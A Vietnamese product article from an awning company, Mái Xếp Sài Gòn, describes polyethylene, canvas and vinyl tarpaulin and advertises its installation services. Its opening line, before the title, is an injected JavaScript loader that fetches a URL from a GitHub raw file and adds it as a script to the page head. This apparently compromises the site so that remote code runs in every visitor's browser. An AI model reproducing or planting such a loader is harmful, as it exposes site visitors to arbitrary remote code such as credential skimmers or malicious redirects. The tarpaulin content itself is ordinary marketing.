;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Bạt Tarpaulin - Vật liệu lý tưởng cho mái xếp bền bỉ, chống thấm

Bạt Tarpaulin – Vật liệu lý tưởng cho mái xếp bền bỉ, chống thấm

Bạt Tarpaulin - Vật liệu lý tưởng cho mái xếp bền bỉ, chống thấm

Thời gian gần đây, bạt Tarpaulin đã trở nên ngày càng phổ biến và được nhiều người tin dùng. Lý do là vì loại vật liệu này có nhiều ưu điểm nổi bật như chống cháy, chống nước, độ bền cao,… Làm thế nào để tìm được nơi bán bạt chất lượng, đáng tin cậy và giá cả hợp lý? Để hiểu rõ hơn về sản phẩm và tìm kiếm địa chỉ mua hàng lắp đặt uy tín, bạn hãy đọc ngay bài viết dưới đây!

Bạt Tarpaulin là gì?

Bạt Tarpaulin là một loại vật liệu dệt may được sử dụng rộng rãi trong nhiều ứng dụng khác nhau. Nó được sản xuất bằng cách dệt các sợi polymer như polyethylene, canvas hoặc vinyl vào một lớp nền chắc chắn. Tarpaulin nổi bật với các đặc tính như chống thấm, chống mưa, chống nắng và độ bền cao.

Bạt Tarpaulin là gì?
Bạt Tarpaulin là gì?

Phân loại bạt Tarpaulin

Để phân loại, chúng ta có thể dựa vào các tiêu chí như chất liệu, độ dày và chức năng của bạt. Dưới đây, Mái Xếp Sài Gòn sẽ phân loại bạt dựa trên chất liệu làm bạt.

Bạt Tarpaulin Polyethylene

Polyethylene là chất liệu được dệt từ các dải nhựa polyetylen với khả năng liên kết bề mặt tốt. Nhờ đó tạo ra một loại vật liệu giống như vải có khả năng chống co giãn theo mọi hướng và không thấm nước. Loại bạt này có thể được làm từ polyetylen mật độ thấp (LDPE) hoặc polyetylen mật độ cao (HDPE). Loại bạt này có tuổi thọ rất nhiều năm vì được thiết kế chống tia cực tím giúp nó có thể chống chịu mọi điều kiện khắc nghiệt của thời tiết.

Bạt Tarpaulin Polyethylene.
Bạt Tarpaulin Polyethylene.

Bạt Tarpaulin Canvas

Tarpaulin Canvas là loại bạt được làm từ vải canvas, một loại vải dệt từ sợi bông hoặc sợi tổng hợp có độ bền cao. Đặc điểm nổi bật của Tarpaulin Canvas có thể kể đến như:

  • Chống nước: Được phủ một lớp chống thấm giúp bảo vệ khỏi nước và độ ẩm.
  • Chống tia UV: Thường được xử lý để chống lại tác động của tia cực tím, giúp kéo dài tuổi thọ khi sử dụng ngoài trời.
  • Độ bền: Có khả năng chịu mài mòn trong điều kiện thời tiết khắc nghiệt.
  • Dễ sử dụng: Linh hoạt và dễ dàng cuộn lại, cắt, may hoặc lắp đặt cho nhiều mục đích khác nhau.

Tarpaulin Canvas thường được sử dụng trong các ứng dụng như che chắn hàng hóa, làm lều trại, bạt che công trình, mái che sân vườn và nhiều ứng dụng khác yêu cầu tính bền vững và độ bền cao.

Bạt Tarpaulin Vinyl 

Tarpaulin Vinyl là loại bạt công nghiệp được thiết kế dùng cho các mục đích sử dụng nặng. Bạt này được làm từ nhựa vinyl mạ vàng với trọng lượng 10 oz/sq yd (340g/m²). Có khả năng không thấm nước và chống mài mòn với độ bền cao. Ngoài ra, bạt còn có khả năng chống dầu, axit, dầu mỡ và nấm mốc. Bạt Vinyl là lựa chọn lý tưởng cho các ngành nông nghiệp, xây dựng, công nghiệp,…

Tarpaulin Vinyl là loại bạt công nghiệp được thiết kế cho các mục đích sử dụng nặng.
Tarpaulin Vinyl là loại bạt công nghiệp được thiết kế cho các mục đích sử dụng nặng.

Ưu điểm nổi bật của bạt Tarpaulin

Bạt Tarpaulin sở hữu nhiều ưu điểm vượt trội khiến nó trở thành lựa chọn lý tưởng cho các công trình:

  • Độ bền cao: Được làm từ vải polyester hoặc PVC, có độ bền cực kỳ cao. Chúng có thể chịu được nhiệt độ, ánh sáng mặt trời, nước và các điều kiện khắc nghiệt khác mà vẫn giữ được chất lượng tốt.
  • Chống thấm nước: Bạt được xử lý chống thấm nước, có thể ngăn chặn nước và độ ẩm xâm nhập hiệu quả. Ưu điểm này giúp bạt có thể che phủ, bảo vệ hàng hóa khỏi thời tiết mưa gió.
  • Dễ dàng vận chuyển và lắp đặt: Bạt thường gọn nhẹ và dễ cuộn gấp, giúp việc vận chuyển và lắp đặt trở nên thuận tiện hơn.
  • Đa dạng ứng dụng: Bạt có thể được sử dụng cho nhiều mục đích như che nắng, che mưa, phủ hàng hóa, làm lều trại, bạt xe tải và nhiều ứng dụng khác.
  • Giá thành hợp lý: So với các loại vật liệu phủ khác, Tarpaulin có giá thành tương đối phải chăng, phù hợp với nhiều nhu cầu sử dụng.
  • Dễ bảo quản và vệ sinh: Bạt được vệ sinh, lau chùi dễ dàng, dễ bảo quản và lưu trữ khi không sử dụng.

Nhìn chung, bạt Tarpaulin là một lựa chọn tuyệt vời cho những ai cần một loại vật liệu phủ bảo vệ hàng hóa, thiết bị hoặc các ứng dụng khác với độ bền và khả năng chống thấm nước tốt.

Ưu điểm nổi bật của bạt Tarpaulin.
Ưu điểm nổi bật của bạt Tarpaulin.

Mua mái xếp chất lượng, giá tốt tại Mái Xếp Sài Gòn

Nếu bạn đang tìm kiếm một giải pháp mái xếp bền đẹp, chất lượng và giá tốt, hãy liên hệ với Mái Xếp Sài Gòn. Chúng tôi là đơn vị chuyên cung cấp các sản phẩm mái xếp sử dụng bạt Tarpaulin uy tín tại Sài Gòn. Mái Xếp cam kết mang đến cho khách hàng những sản phẩm và dịch vụ tốt nhất:

  • Cam kết giá rẻ với sản phẩm đẹp, chất lượng cao so với các sản phẩm khác bên ngoài thị trường.
  • Chúng tôi sẽ đến tận nơi khảo sát, tư vấn và báo giá cho quý khách.
  • Sản phẩm được hoạt động, bảo hành một cách tốt nhất.
  • Phương châm phục vụ: Tận tâm, uy tín, có trách nhiệm với các công trình thi công.
  • Đội ngũ nhân viên kinh nghiệm sẽ mang đến cho khách hàng sự nhanh chóng và chất lượng.

Hãy đến với Mái Xếp Sài Gòn để trải nghiệm các dịch vụ tại cửa hàng chúng tôi nhé!

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *